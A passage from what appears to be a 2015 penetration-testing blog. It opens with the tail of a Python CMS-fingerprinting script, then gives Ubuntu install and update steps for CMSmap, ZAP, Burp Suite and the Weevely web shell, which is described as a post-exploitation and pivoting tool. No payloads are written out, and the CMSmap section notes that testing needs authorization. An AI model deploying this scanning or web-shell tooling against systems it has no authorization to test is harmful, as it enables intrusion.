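            scores[cms] = scores.get(cms, 0) + 1
            if m.groups() and m.group(1):
                versions[cms] = m.group(1)
    m = re.search(r"Drupal\s*([\d.]*)", headers.get("x-generator", ""), re.I)
    if m:
        scores["Drupal"] = scores.get("Drupal", 0) + 1
        if m.group(1):
            versions.setdefault("Drupal", m.group(1))
    return {"scores": scores, "versions": versions}


def best_guess(html, headers=None):
    """(cms, version) with the most hits, or (None, None) if nothing matched."""
    r = fingerprint(html, headers)
    if not r["scores"]:
        return None, None
    cms = max(r["scores"], key=r["scores"].get)
    return cms, r["versions"].get(cms)


if __name__ == "__main__":
    sample = ('<html><head><meta name="generator" content="WordPress 4.2.4" />'
              '<link rel="stylesheet" href="/wp-content/themes/x/style.css">'
              '</head></html>')
    print(best_guess(sample))
```

A generator tag is trivially removed by administrators, which is why a real scanner such as CMSmap also requests well-known files (WordPress ships a readme.html at the site root, for example) and then moves on to plugin and theme paths; that active phase is the part that needs authorization.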


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/Dionach/CMSmap.git
cd CMSmap
python cmsmap.py -t http://<target>

* Replace <target> with a site you are authorized to test. CMSmap actively requests known paths and probes for vulnerabilities, so do not point it at third-party sites.



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/CMSmap
git pull origin master



Reference

Nil


That's all! See you.


Thursday, August 20, 2015

HOWTO : ZAP on Ubuntu 14.04 LTS

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.


Install

sudo apt-get install default-jre unzip

cd ~
mkdir arsenal
cd arsenal

wget https://github.com/zaproxy/zaproxy/releases/download/w2015-08-12/ZAP_WEEKLY_D-2015-08-12.zip
unzip ZAP_WEEKLY_D-2015-08-12.zip
rm ZAP_WEEKLY_D-2015-08-12.zip
cd ZAP_D-2015-08-12
./zap.sh



* ZAP_WEEKLY_D-2015-08-12.zip is used as an example.
* The ZAP team generates weekly releases of ZAP from the trunk, typically every Monday.
These are intended for people who want to use all of the features added since the last "full" release but don't want the hassle of building ZAP from source.
While the team endeavours to ensure that weekly releases are robust, things may be broken or only partially implemented.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


cd ~/arsenal/

Go to Download to download ZAP Weekly and repeat the procedure of "Install" previously mentioned.


Reference

Wiki

Video


That's all! See you.

HOWTO : Burp Suite on Ubuntu 14.04 LTS

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Install

sudo apt-get install curl default-jre

cd ~
mkdir arsenal
cd arsenal
mkdir burpsuite
cd burpsuite
curl "https://portswigger.net/DownloadUpdate.ashx?Product=Free" -o burpsuite_free.jar
java -jar -Xmx1024m burpsuite_free.jar



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/burpsuite
rm burpsuite_free.jar
curl "https://portswigger.net/DownloadUpdate.ashx?Product=Free" -o burpsuite_free.jar



Reference

Getting Started

Documentation

See also : Professional Edition


That's all! See you.

Wednesday, August 19, 2015

HOWTO : Weevely on Ubuntu 14.04 LTS

Weevely is a command-line web shell, dynamically extended over the network at runtime, designed for remote administration and pen testing. It provides a weaponized, telnet-like console through a PHP script (the agent) running on the target, even in restricted environments.

The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.


Install

sudo apt-get install git build-essential python-pip libyaml-dev python-dev
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/epinna/weevely3.git
cd weevely3
./weevely.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~/arsenal/weevely3
git pull origin master



Reference

Wiki


That's all! See you.